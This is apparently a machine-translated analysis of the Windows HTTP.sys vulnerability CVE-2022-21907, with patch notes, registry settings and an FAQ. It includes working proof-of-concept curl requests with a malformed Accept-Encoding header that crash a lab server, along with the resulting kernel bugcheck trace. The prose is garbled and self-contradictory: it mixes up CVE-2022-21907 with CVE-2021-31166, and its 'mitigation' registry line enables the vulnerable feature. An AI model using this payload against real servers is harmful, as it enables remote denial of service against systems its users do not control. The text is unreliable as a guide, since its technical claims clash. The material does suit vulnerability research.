technical analysis
Update: seems to be https://piffd0s.medium.com/patch-diffing-cve-2022-21907-b739f4108eee Some preliminary patch analysis has been conducted for this vulnerability, which seems to indicate that the patched functions are UlFastSendHttpResponse, ulallocatefasttracker, ulpfastsendcompleteworker, UlpFreeFastTracker, and ulallocatefasttracker tolookaside. They also noted that a safe assessment may be that the vulnerable code path is hit first in UlFastSendHttpResponse and some of the fixup / limitations were applied to memory chunks in the other functions. However, the analysis is still ongoing.
There is a lot of confusion about this vulnerability. It is http An RCE in the HTTP tracker support function of sys component, which is responsible for the HTTP protocol stack used by several high-level Windows components. The best article I can find is in https://isc.sans.edu/diary/28234 But please note that the investigation is still ongoing and things may change over time.
First of all, it should be clear that although http Sys appears to be related to IIS, but it is not an IIS vulnerability in itself. as https://isc.sans.edu/diary/28234http.sys You can find the component netsh http show servicestate in use by running the command. You may find that more components use it than you think. For example, Intel components use it for some strange built-in HTTP servers (yes, I'm not sure, but you go).
Secondly, although the vulnerability affects windows 10 1809 and Windows Server 2019 and later, by default, and only on Windows 10 1809 and Windows Server 2019, HKLM:\System\CurrentControlSet\Services\HTTP\Parameter\EnableTrailerSupport is set to 0 by default, thus disabling the vulnerable Trailer function. This means that these versions do not have out of the box vulnerabilities, but they are if the HKLM:\System\CurrentControlSet\Services\HTTP\Parameter\EnableTrailerSupport registry key is set to 1. All other affected versions of windows are vulnerable when using their default settings.
Since this is a kernel level vulnerability and it is exploited remotely, I think now is a good time to remind people that RCE errors in the windows kernel are becoming more and more difficult to exploit. Although Windows 7 is easier to be utilized due to the lack of some mitigation measures, in Windows 10 and Windows 11, some mitigation measures have been implemented in the windows kernel to prevent RCE kernel utilization, and according to my experience, they can achieve this effect well (local privilege escalation attack is another story that needs to be improved).
Finally, for those who want to know what Trailer support is (such as myself), HTTPS: / / ISC sans. Edu / diary / 28234 indicates that RFC7230 specifies the protocol supported by the Trailer and that it makes sense to the server only if transfer encoding: chunked is used in the request. This allows the requester to essentially divide the request into several smaller packets and then send the request header only after sending the request body. The original idea behind this is that the request body may be generated over time. We want to start sending data when the data is available to speed up processing and ensure faster operation.
I hope this will help. At present, there are not many details. Before people can better determine the root cause of this problem, some patch differences may be needed, but now I will say patches. If you can remember at the same time, considering Microsoft's kernel level mitigation measures for Windows 10, if possible, An effective exploit may take time to develop.
Description:
Note: after several hours of testing and experiment, I found no loopholes. This is just a ridiculous experiment by Microsoft. When I decided to install IIS packages on these windows platforms, everything was normal and everything was patched! Windows Server 2019, windows 10 version 1809 - 2018 does not have vulnerabilities by default, but after I decided to upgrade from 1909 to 2004, I found a serious problem! Windows 10 version 2004 – 2020 is still vulnerable to the HTTP protocol stack (HTTP.sys). Attack method: buffer overflow - denial of service and restart the system. This problem has existed since last year. It was reported on CVE-2021-31166 and still exists! In those days, I did this work again with the help and cooperation of Axel Souchet 0vercl0k, the author of this idea. On that day,
Status: severe
- be careful: By default, the HTTP tracker support feature that contains the vulnerability is inactive. The following registry keys must be configured to introduce vulnerability:
Often ask questions
- How can an attacker exploit this vulnerability?
- In most cases, an unauthenticated attacker can use the HTTP protocol stack (http.sys) to send a crafted packet to the target server to process the packet.
- Is this a worm?
- yes. Microsoft recommends patching the affected servers first.
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\HTTP\Parameters\ " EnableTrailerSupport " =dword:00000001
This mitigation does not apply to other affected versions.
Simple test connection before commissioning:
curl " http://192.168.1.8/201 " -H " Accept-Encoding: pwn, pwned, package "
- Output:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>
<title>404 - File or directory not found.</title>
<style type="text/css">
<!--
body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}
fieldset{padding:0 15px 10px 15px;}
h1{font-size:2.4em;margin:0;color:#FFF;}
h2{font-size:1.7em;margin:0;color:#CC0000;}
h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;}
#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;
background-color:#555555;}
#content{margin:0 0 0 2%;position:relative;}
.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}
-->
</style>
</head>
<body>
<div id="header"><h1>Server Error</h1></div>
<div id="content">
<div class="content-container"><fieldset>
<h2>404 - File or directory not found.</h2>
<h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3>
</fieldset></div>
</div>
</body>
</html>302
curl "http://192.168.1.8/302" -H "Accept-Encoding: pwn, pwned, package"
- Output:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>
<title>404 - File or directory not found.</title>
<style type="text/css">
<!--
body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}
fieldset{padding:0 15px 10px 15px;}
h1{font-size:2.4em;margin:0;color:#FFF;}
h2{font-size:1.7em;margin:0;color:#CC0000;}
h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;}
#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;
background-color:#555555;}
#content{margin:0 0 0 2%;position:relative;}
.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}
-->
</style>
</head>
<body>
<div id="header"><h1>Server Error</h1></div>
<div id="content">
<div class="content-container"><fieldset>
<h2>404 - File or directory not found.</h2>
<h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3>
</fieldset></div>
</div>
</body>
</html>404
curl "http://192.168.1.8/404" -H "Accept-Encoding: pwn, pwned, package"
- Output:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>
<title>404 - File or directory not found.</title>
<style type="text/css">
<!--
body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}
fieldset{padding:0 15px 10px 15px;}
h1{font-size:2.4em;margin:0;color:#FFF;}
h2{font-size:1.7em;margin:0;color:#CC0000;}
h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;}
#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;
background-color:#555555;}
#content{margin:0 0 0 2%;position:relative;}
.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}
-->
</style>
</head>
<body>
<div id="header"><h1>Server Error</h1></div>
<div id="content">
<div class="content-container"><fieldset>
<h2>404 - File or directory not found.</h2>
<h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3>
</fieldset></div>
</div>
</body>
</html>Bugcheck:
1: kd> kp
Child-SP RetAddr Call Site
ffffa102`87993158 fffff806`50404929 nt!KeBugCheckEx
ffffa102`87993160 fffff806`50404d50 nt!KiBugCheckDispatch+0x69
ffffa102`879932a0 fffff806`504030e3 nt!KiFastFailDispatch+0xd0
ffffa102`87993480 fffff806`4f33f537 nt!KiRaiseSecurityCheckFailure+0x323
ffffa102`87993610 fffff806`4f2f6ac5 HTTP!UlFreeUnknownCodingList+0x63
ffffa102`87993640 fffff806`4f2cd191 HTTP!UlpParseAcceptEncoding+0x298f5
ffffa102`87993730 fffff806`4f2a9368 HTTP!UlAcceptEncodingHeaderHandler+0x51
ffffa102`87993780 fffff806`4f2a8a47 HTTP!UlParseHeader+0x218
ffffa102`87993880 fffff806`4f204c5f HTTP!UlParseHttp+0xac7
ffffa102`879939e0 fffff806`4f20490a HTTP!UlpParseNextRequest+0x1ff
ffffa102`87993ae0 fffff806`4f2a4852 HTTP!UlpHandleRequest+0x1aa
ffffa102`87993b80 fffff806`5035b715 HTTP!UlpThreadPoolWorker+0x112
ffffa102`87993c10 fffff806`503fa078 nt!PspSystemThreadStartup+0x55
ffffa102`87993c60 00000000`00000000 nt!KiStartSystemThread+0x28
1: kd> !analyze
*******************************************************************************
* *
* Bugcheck Analysis *
* *
*******************************************************************************
KERNEL_SECURITY_CHECK_FAILURE (139)
A kernel component has corrupted a critical data structure. The corruption
could potentially allow a malicious user to gain control of this machine.
Arguments:
Arg1: 0000000000000003, A LIST_ENTRY has been corrupted (i.e. double remove).
Arg2: ffffa10287993480, Address of the trap frame for the exception that caused the bugcheck
Arg3: ffffa102879933d8, Address of the exception record for the exception that caused the bugcheck
Arg4: 0000000000000000, Reserved
Debugging Details:
------------------
*** WARNING: Unable to verify timestamp for win32k.sys
BUGCHECK_CODE: 139
BUGCHECK_P1: 3
BUGCHECK_P2: ffffa10287993480
BUGCHECK_P3: ffffa102879933d8
BUGCHECK_P4: 0
PROCESS_NAME: System
ERROR_CODE: (NTSTATUS) 0xc0000409 - The system detected an overrun of a stack-based buffer in this application. This overrun could potentially allow a malicious user to gain control of this application.
SYMBOL_NAME: HTTP!UlFreeUnknownCodingList+63
MODULE_NAME: HTTP
IMAGE_NAME: HTTP.sys
FAILURE_BUCKET_ID: 0x139_3_CORRUPT_LIST_ENTRY_HTTP!UlFreeUnknownCodingList
FAILURE_ID_HASH: {1b194f54-2d0b-e3a8-62e2-afded08822bd}
Followup: MachineOwner
---------Aftershock:
